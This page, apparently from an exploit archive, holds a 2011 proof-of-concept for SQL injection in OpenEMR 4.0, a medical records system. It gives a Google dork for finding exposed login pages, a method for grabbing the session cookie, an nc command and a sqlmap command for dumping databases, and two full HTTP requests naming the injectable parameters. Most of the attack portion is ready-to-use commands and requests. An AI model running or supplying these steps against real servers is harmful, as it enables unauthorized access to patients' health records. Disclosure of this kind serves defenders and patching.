Open EMR 4.0 SQL Injection

Open EMR 4.0 SQL Injection: Posted Oct 21, 2011; Authored by Houssam Sahli, Mehdi Boukazoula; Open EMR version 4.0 suffers from multiple remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, sql injection; SHA-256 | 115ccc61323b5f3e6518c7a2084a9bd363254a02e7ef505592e749b25644dfd5; Download | Favorite | View

Open EMR 4.0 SQL Injection

# Exploit Title: Open EMR
# Google Dork: inurl:"/interface/login/login_frame.php" intitle:"Login" intext:"Username:"
# Date: 3 / 08 / 2011 .
# Author: Mehdi Boukazoula ; Houssam Sahli .
# Software Link with patch : http://www.oemr.org/wiki/OpenEMR_Downloads
# Version: v 4.0 full patched
# Tested on: v 4.0
# Description : the authenticated user can exploit this vulnerability by getting the cookie from browser using url javascript:alert(document.cookie) ,put it in request file with sql command and exploit:

root@# cat request.txt | nc -vv yourhost 80
or simply use sqlmap like this :
root@# sqlmap -r request.txt -p "YOUR PARAMETER" --dbs
--------------------------------------------------------------------------------------------------------

---Request1 : Affected parameters : provider_id + pc_category
POST http://127.0.0.1/openemr/interface/main/calendar/index.php?module=PostCalendar&func=search HTTP/1.1
Accept-language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-encoding: identity
Keep-alive: 115
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Host: 127.0.0.1
Referer: http://127.0.0.1/openemr/interface/main/calendar/index.php?module=PostCalendar&func=search
Cookie: PUT-THE-COOKIE-HERE
Content-type: application/x-www-form-urlencoded
Proxy-connection: keep-alive

pc_keywords=bob&provider_id=_ALL_&end=08/10/2011&pc_category=&submit=Submit&start=08/03/2011&pc_keywords_andor=AND&pc_facility=
--------------------------------------------------------------
---Request2 : Affected parameters : form_patient_id
POST http://127.0.0.1/openemr/interface/reports/chart_location_activity.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/openemr/interface/reports/chart_location_activity.php
Cookie: PUT-THE-COOKIE-HERE
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

form_refresh=true&form_patient_id=patient
---------------------------------------------------------------

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Open EMR 4.0 SQL Injection

Open EMR 4.0 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Open EMR 4.0 SQL Injection

Share This

Open EMR 4.0 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems